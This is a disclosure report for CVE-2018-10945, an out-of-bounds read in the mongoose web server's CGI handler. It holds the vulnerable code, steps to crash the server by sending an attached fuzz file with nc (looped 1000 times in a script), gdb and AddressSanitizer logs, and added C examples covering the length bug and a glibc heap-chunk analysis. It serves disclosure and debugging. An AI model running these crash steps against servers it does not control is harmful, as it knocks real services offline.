CVE-2018-10945 mongoose out-of-bounds access
Hello, I found a vulnerability in the mg_handle_cgi function.
The function is in mongoose.c, line 8925
8923     if (mg_start_process(opts->cgi_interpreter, prog, blk.buf, blk.vars, dir,
8924                          fds[1]) != 0) {
8925       size_t n = nc->recv_mbuf.len - (hm->message.len - hm->body.len);
8926       struct mg_connection *cgi_nc =
8927           mg_add_sock(nc->mgr, fds[0], mg_cgi_ev_handler MG_UD_ARG(nc));
8928       struct mg_http_proto_data *cgi_pd = mg_http_get_proto_data(nc);
8929       cgi_pd->cgi.cgi_nc = cgi_nc;
8930 #if !MG_ENABLE_CALLBACK_USERDATA
8931       cgi_pd->cgi.cgi_nc->user_data = nc;
8932 #endif
8933       nc->flags |= MG_F_HTTP_CGI_PARSE_HEADERS;
8934       /* Push POST data to the CGI */
8935       if (n > 0 && n < nc->recv_mbuf.len) {
8936         mg_send(cgi_pd->cgi.cgi_nc, hm->body.p, n);
8937       }
Note line 8925: n is assigned nc->recv_mbuf.len - (hm->message.len - hm->body.len).
When I debugged it, I found that nc->recv_mbuf.len = 1024 while hm->message.len - hm->body.len is a small number.
This can make n > hm->body.len, which leads the program to read memory beyond the end of hm->body.
And when I triggered this vulnerability many times (200+), I got a null pointer dereference (UAF).
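The length computation above, reduced to a stand-alone program so the arithmetic can be checked: this is an added example, not code from the report or from mongoose. The structs are stand-ins that only mirror the field names the report uses (recv_mbuf.len, message.len, body.len, body.p); the bounded variant is an illustration of the kind of check a reviewer would ask for, not mongoose's actual patch; the buffer sizes and offsets are constructed, chosen so that the unchecked result equals the 876-byte READ in the AddressSanitizer log further down.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Reduced stand-ins for the mongoose structures the report refers to.
 * Field names follow the report; the layouts are NOT mongoose's definitions. */
struct mbuf_stub { const char *buf; size_t len; };            /* nc->recv_mbuf */
struct str_stub  { const char *p; size_t len; };              /* struct mg_str */
struct http_message_stub { struct str_stub message, body; };  /* hm */

/* The computation from line 8925 plus the guard from line 8935:
 * "bytes received so far minus the header bytes" is handed to mg_send().
 * Nothing ties that number to hm->body.len or to where hm->body.p points. */
size_t cgi_post_len_unchecked(const struct mbuf_stub *rb,
                              const struct http_message_stub *hm) {
    size_t n = rb->len - (hm->message.len - hm->body.len);
    return (n > 0 && n < rb->len) ? n : 0;
}

/* Bounded alternative (illustrative, not mongoose's patch): push at most the
 * parsed body, and only if that range lies entirely inside recv_mbuf. */
size_t cgi_post_len_checked(const struct mbuf_stub *rb,
                            const struct http_message_stub *hm) {
    size_t header_len, avail, body_off;
    if (hm->message.len < hm->body.len) return 0;    /* inconsistent parse */
    header_len = hm->message.len - hm->body.len;
    if (rb->len < header_len) return 0;              /* headers not even complete */
    avail = rb->len - header_len;                    /* what the original computes */
    if (avail > hm->body.len) avail = hm->body.len;  /* clamp to the parsed body */
    /* body.p must lie inside recv_mbuf, and body.p + avail must not overrun it */
    if ((uintptr_t)hm->body.p < (uintptr_t)rb->buf) return 0;
    body_off = (uintptr_t)hm->body.p - (uintptr_t)rb->buf;
    if (body_off > rb->len || avail > rb->len - body_off) return 0;
    return avail;
}

/* Constructed scenario (not the bytes of the report's crash.fuzz): a 1024-byte
 * receive buffer, header_len bytes of request line and headers, and a body the
 * parser reports at body_off with length body_len. Returns the byte count the
 * chosen variant would hand to mg_send(). */
size_t run_case(size_t header_len, size_t body_off, size_t body_len, int checked) {
    static char rxbuf[1024];
    struct mbuf_stub rb = { rxbuf, sizeof rxbuf };
    struct http_message_stub hm;
    memset(rxbuf, 'A', sizeof rxbuf);
    hm.body.p = rxbuf + body_off;
    hm.body.len = body_len;
    hm.message.len = header_len + body_len;
    return checked ? cgi_post_len_checked(&rb, &hm) : cgi_post_len_unchecked(&rb, &hm);
}

int main(void) {
    /* 148 header bytes and a 20-byte body: the unchecked value is 876 bytes,
     * the size of the READ in the ASan log, although the body is only 20 bytes. */
    printf("well-formed request: unchecked=%zu checked=%zu\n",
           run_case(148, 148, 20, 0), run_case(148, 148, 20, 1));
    /* body.p sits 900 bytes into the 1024-byte buffer: 876 bytes from there run
     * 752 bytes past the allocation; the bounded version refuses to send. */
    printf("body near buffer end: unchecked=%zu checked=%zu\n",
           run_case(148, 900, 200, 0), run_case(148, 900, 200, 1));
    return 0;
}
```

The point the two cases make is that the guard on line 8935 only rejects an n that underflowed past the whole buffer; it never relates n to the body the parser actually found, so any request whose received byte count exceeds its parsed length produces an over-long read from hm->body.p.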
Reproducing normally
The steps to reproduce the vulnerability
Step 1
Download the latest source of mongoose and compile the code in the directory examples/simplest_web_server.
Then run it:
wget https://github.com/cesanta/mongoose/archive/6.11.zip
unzip 6.11.zip
cd mongoose-6.11/examples/simplest_web_server
make
./simplest_web_server
This starts an HTTP server on port 8000
01:09 haclh@ubuntu:simplest_web_server $ ./simplest_web_server
Starting web server on port 8000
Step 2
Use nc to send the payload to port 8000
nc 127.0.0.1 8000 < ~/vmdk_kernel/fuzz_workplace/crash.fuzz
PS: the crash.fuzz file is attached to the email
Then we get Segmentation fault (core dumped)
Reproducing with gdb
If you want to reproduce the vulnerability in gdb, you have to send the payload many times (maybe 200+) to trigger the crash
Step 1
Download and compile the source, and use gdb to start it.
01:27 haclh@ubuntu:simplest_web_server $ gdb ./simplest_web_server -q
Reading symbols from ./simplest_web_server...done.
(gdb) set follow-fork-mode parent
(gdb) r
Starting program: /tmp/t/mongoose-6.11/examples/simplest_web_server/simplest_web_server
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Starting web server on port 8000
PS: you should set follow-fork-mode parent
Step 2
Send the payload many times to the port
01:33 haclh@ubuntu:simplest_web_server $ cat cyc.sh
#!/bin/bash
for i in {1..1000}
do
nc 127.0.0.1 8000 < ~/vmdk_kernel/fuzz_workplace/crash.fuzz
echo $i
done
echo $i
01:33 haclh@ubuntu:simplest_web_server $ ./cyc.sh
I wrote a shell script to do this.
Then we can see gdb catch the crash
01:27 haclh@ubuntu:simplest_web_server $ gdb ./simplest_web_server -q
Reading symbols from ./simplest_web_server...done.
(gdb) set follow-fork-mode parent
(gdb) r
Starting program: /tmp/t/mongoose-6.11/examples/simplest_web_server/simplest_web_server
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Starting web server on port 8000
Program received signal SIGSEGV, Segmentation fault.
0x00000000004087cf in mg_send (nc=0x6235a0, buf=0x623d10, len=68) at ../../mongoose.c:2635
2635 nc->iface->vtable->tcp_send(nc, buf, len);
(gdb) p nc->iface
$1 = (struct mg_iface *) 0x0
(gdb) p nc
$2 = (struct mg_connection *) 0x6235a0
(gdb) x/4xg 0x6235a0
0x6235a0: 0x00007ffff7bb4cc8 0x00007ffff7bb4cc8
0x6235b0: 0x0000000000000000 0x0000000000000000
(gdb) x/4xg 0x6235a0-0x10
0x623590: 0x0000000000000000 0x0000000000000161
0x6235a0: 0x00007ffff7bb4cc8 0x00007ffff7bb4cc8
(gdb) x/4xg 0x6235a0-0x10+0x160
0x6236f0: 0x0000000000000160 0x00000000000000e0
0x623700: 0x0000000000623b10 0x0000000000000000
(gdb)
We can see that nc->iface is 0x0, and the code wants nc->iface->vtable->tcp_send; this leads to a null pointer dereference.
If you know glibc malloc, you can see that nc has been freed
Reproducing with AddressSanitizer
You can also compile with clang and AddressSanitizer to get more detailed information
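How the three x/4xg dumps show that nc was freed, as an added example that is not part of the report: the qwords are the ones printed in the gdb session above (nc = 0x6235a0, so its chunk header starts at 0x623590), interpreted with the glibc 2.23 malloc chunk layout that the ASan stack trace's libc path identifies. The helper names and the in-use counter-example are constructed for this illustration.

```c
#include <stdint.h>
#include <stdio.h>

/* glibc malloc chunk: [prev_size][size | flags] followed by user data.
 * The low three bits of the size field are flags; PREV_INUSE records whether
 * the chunk immediately *before* this one is in use. */
#define PREV_INUSE ((uint64_t)0x1)
#define SIZE_BITS  ((uint64_t)0x7)

struct chunk_view {
    uint64_t size_field;       /* qword at chunk+8 */
    uint64_t fd, bk;           /* first two user-data qwords (bin links once freed) */
    uint64_t next_prev_size;   /* qword at chunk+size */
    uint64_t next_size_field;  /* qword at chunk+size+8 */
};

/* Chunk size with the flag bits masked off. */
uint64_t chunk_size(uint64_t size_field) { return size_field & ~SIZE_BITS; }

/* A chunk is free exactly when its successor's PREV_INUSE bit is clear:
 * glibc stores the in-use bit of chunk X in the header of the chunk after X. */
int chunk_is_free(struct chunk_view c) {
    return (c.next_size_field & PREV_INUSE) == 0;
}

/* For a free chunk the successor's prev_size must echo this chunk's size;
 * a mismatch means the dump is misaligned or the heap metadata is corrupt. */
int prev_size_consistent(struct chunk_view c) {
    return c.next_prev_size == chunk_size(c.size_field);
}

/* fd == bk happens when this chunk is the only entry in a doubly-linked bin:
 * both links then point at the bin header inside libc's main_arena. */
int sole_bin_entry(struct chunk_view c) { return c.fd == c.bk; }

/* The qwords from the gdb session: x/4xg at 0x6235a0-0x10, at 0x6235a0, and
 * at 0x6235a0-0x10+0x160. */
struct chunk_view nc_chunk_from_report(void) {
    struct chunk_view c;
    c.size_field      = 0x161;              /* 0x623598: size 0x160, PREV_INUSE set */
    c.fd              = 0x00007ffff7bb4cc8; /* 0x6235a0: libc address, not a connection field */
    c.bk              = 0x00007ffff7bb4cc8; /* 0x6235a8 */
    c.next_prev_size  = 0x160;              /* 0x6236f0 = 0x623590 + 0x160 */
    c.next_size_field = 0xe0;               /* 0x6236f8: PREV_INUSE clear */
    return c;
}

/* Constructed counter-example: the same chunk while still allocated. The
 * successor keeps PREV_INUSE set and prev_size is unused (stale data). */
struct chunk_view in_use_example(void) {
    struct chunk_view c = nc_chunk_from_report();
    c.next_size_field = 0xe1;
    c.next_prev_size  = 0;
    return c;
}

int main(void) {
    struct chunk_view c = nc_chunk_from_report();
    printf("size=0x%llx free=%d prev_size_consistent=%d fd==bk=%d\n",
           (unsigned long long)chunk_size(c.size_field), chunk_is_free(c),
           prev_size_consistent(c), sole_bin_entry(c));
    return 0;
}
```

All three signs line up for nc: the successor at +0x160 has PREV_INUSE clear, its prev_size repeats 0x160, and the first two user-data qwords have been overwritten with identical libc bin pointers, which is why fields of the connection read back as zero or garbage and nc->iface is NULL. This reading is specific to glibc 2.23 as used in the report; from glibc 2.26 onward a chunk of this size would normally land in tcache first, where the successor's PREV_INUSE bit stays set and the first user qword holds a tcache next pointer instead, so the same dump would have to be interpreted differently.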
clang -fsanitize=address simplest_web_server.c ../../mongoose.c -o simplest_web_server -g -W -Wall -Werror -I../.. -Wno-unused-function -DMG_DISABLE_DAV_AUTH -DMG_ENABLE_FAKE_DAVLOCK -pthread
Then run it and send the payload to the server; you get the log below.
01:19 haclh@ubuntu:simplest_web_server $ ./simplest_web_server
Starting web server on port 8000
==16867==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000000980 at pc 0x0000004e653d bp 0x7fffb8bab790 sp 0x7fffb8baaf40
READ of size 876 at 0x619000000980 thread T0
#0 0x4e653c in __asan_memcpy /home/haclh/vmdk_kernel/libfuzzer-workshop-master/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23
#1 0x53b9d6 in mbuf_insert /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:1477:24
#2 0x53bafc in mbuf_append /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:1490:10
#3 0x550dc3 in mg_socket_if_tcp_send /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3356:3
#4 0x546ffa in mg_send /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2635:5
#5 0x582179 in mg_handle_cgi /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:8936:7
#6 0x56e5a5 in mg_send_http_file /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:7967:5
#7 0x56adb7 in mg_serve_http /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:8072:3
#8 0x5219c7 in ev_handler /tmp/t/mongoose-6.11/examples/simplest_web_server/simplest_web_server.c:11:5
#9 0x544af8 in mg_call /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2241:5
#10 0x55d475 in mg_http_call_endpoint_handler /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:8426:3
#11 0x55cdb3 in mg_http_handler /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:6245:7
#12 0x544af8 in mg_call /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2241:5
#13 0x5494e7 in mg_recv_common /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2689:3
#14 0x548c38 in mg_if_recv_tcp_cb /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2693:3
#15 0x5526ca in mg_handle_tcp_read /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3554:7
#16 0x55196f in mg_mgr_handle_conn /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3679:9
#17 0x55564b in mg_socket_if_poll /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3877:5
#18 0x546906 in mg_mgr_poll /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2407:11
#19 0x52191b in main /tmp/t/mongoose-6.11/examples/simplest_web_server/simplest_web_server.c:33:5
#20 0x7f4cbf9a582f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#21 0x41ad68 in _start (/tmp/t/mongoose-6.11/examples/simplest_web_server/simplest_web_server+0x41ad68)
0x619000000980 is located 0 bytes to the right of 1024-byte region [0x619000000580,0x619000000980)
allocated by thread T0 here:
#0 0x4e76f8 in __interceptor_malloc /home/haclh/vmdk_kernel/libfuzzer-workshop-master/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88
#1 0x552521 in mg_handle_tcp_read /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3518:24
#2 0x55196f in mg_mgr_handle_conn /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3679:9
#3 0x55564b in mg_socket_if_poll /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3877:5
#4 0x546906 in mg_mgr_poll /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2407:11
#5 0x52191b in main /tmp/t/mongoose-6.11/examples/simplest_web_server/simplest_web_server.c:33:5
#6 0x7f4cbf9a582f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/haclh/vmdk_kernel/libfuzzer-workshop-master/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c327fff80e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff80f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff8100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff8110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff8120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c327fff8130:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==16867==ABORTING